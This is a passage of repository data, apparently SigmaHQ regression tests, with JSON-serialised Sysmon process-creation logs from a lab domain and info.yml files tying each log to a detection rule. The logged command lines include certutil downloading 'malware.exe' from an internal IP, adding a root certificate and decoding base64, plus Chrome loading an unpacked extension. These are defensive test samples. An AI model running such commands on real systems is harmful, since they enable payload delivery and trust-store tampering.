    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:30:09.492105Z\"\n        }\n      },\n      \"EventRecordID\": 33024467,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:30:09.480\",\n      \"ProcessGuid\": \"5AA13A44-AF01-68FE-535E-000000004002\",\n      \"ProcessId\": 2536,\n      \"Image\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n      \"FileVersion\": \"141.0.7390.123\",\n      \"Description\": \"Google Chrome\",\n      \"Product\": \"Google Chrome\",\n      \"Company\": \"Google LLC\",\n      \"OriginalFileName\": \"chrome.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"  --load-extension=\\\"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\HHe2lr\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": 
\"High\",\n      \"Hashes\": \"SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml",
    "content": "id: 78e88bc4-deea-488e-a27f-b4d9d07d3a72\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 27ba3207-dd30-4812-abbf-5d20c57d474e\n      title: Suspicious Chromium Browser Instance Executed With Custom Extension\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:34:35.016637Z\"\n        }\n      },\n      \"EventRecordID\": 33119645,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:34:35.002\",\n      \"ProcessGuid\": \"5AA13A44-B00B-68FE-9F5E-000000004002\",\n      \"ProcessId\": 4584,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n      \"FileVersion\": \"141.0.3537.99\",\n      \"Description\": \"Microsoft Edge\",\n      \"Product\": \"Microsoft Edge\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"msedge.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\"  \\\"http://10.0.1.14/malware.zip\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      
\"Hashes\": \"SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml",
    "content": "id: c7f0da2b-2eb9-46ee-abd0-d2f8e3c81975\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 94771a71-ba41-4b6e-a757-b531372eaab6\n      title: File Download From Browser Process Via Inline URL\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:39:33.565515Z\"\n        }\n      },\n      \"EventRecordID\": 33232425,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:39:33.564\",\n      \"ProcessGuid\": \"5AA13A44-B135-68FE-035F-000000004002\",\n      \"ProcessId\": 10712,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\",\n      \"FileVersion\": \"128.14.0\",\n      \"Description\": \"Tor Browser\",\n      \"Product\": \"Tor Browser\",\n      \"Company\": \"Mozilla Corporation\",\n      \"OriginalFileName\": \"firefox.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D\",\n      \"ParentProcessGuid\": \"5AA13A44-B135-68FE-025F-000000004002\",\n      \"ParentProcessId\": 1292,\n      \"ParentImage\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml",
    "content": "id: 8e750cec-bc57-4b20-bd0a-006733558c56\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c\n      title: Tor Client/Browser Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T16:54:23.873276Z\"\n        }\n      },\n      \"EventRecordID\": 11383720,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 16:54:23.866\",\n      \"ProcessGuid\": \"5AA13A44-00BF-68FD-3F35-000000004002\",\n      \"ProcessId\": 8592,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -addstore -f root C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\cert.cer\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": 
\"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml",
    "content": "id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d2125259-ddea-4c1c-9c22-977eb5b29cf0\n      title: New Root Certificate Installed Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T16:56:16.019794Z\"\n        }\n      },\n      \"EventRecordID\": 11418519,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 16:56:16.013\",\n      \"ProcessGuid\": \"5AA13A44-0130-68FD-4E35-000000004002\",\n      \"ProcessId\": 5112,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -decode file.base64 file-decoded.ext\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/info.yml",
    "content": "id: e582dfce-5cb3-4991-9719-9a336eb90a6f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7\n      title: File Decoded From Base64/Hex Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:02:36.900637Z\"\n        }\n      },\n      \"EventRecordID\": 11537869,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:02:36.894\",\n      \"ProcessGuid\": \"5AA13A44-02AC-68FD-7A35-000000004002\",\n      \"ProcessId\": 6484,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil.exe  -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": 
\"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml",
    "content": "id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b\n      title: Suspicious Download Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:01:06.116464Z\"\n        }\n      },\n      \"EventRecordID\": 11507958,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:01:06.109\",\n      \"ProcessGuid\": \"5AA13A44-0252-68FD-7235-000000004002\",\n      \"ProcessId\": 6432,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil.exe  -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      
\"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml",
    "content": "id: 76e024fd-9064-46ae-85f8-c524dc6b3492\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829\n      title: Suspicious File Downloaded From Direct IP Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:02:36.900637Z\"\n        }\n      },\n      \"EventRecordID\": 11537869,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:02:36.894\",\n      \"ProcessGuid\": \"5AA13A44-02AC-68FD-7A35-000000004002\",\n      \"ProcessId\": 6484,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil.exe  -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": 
\"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml",
    "content": "id: 507f6de5-f414-4825-b1a3-e8909fdc8700\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794\n      title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json",
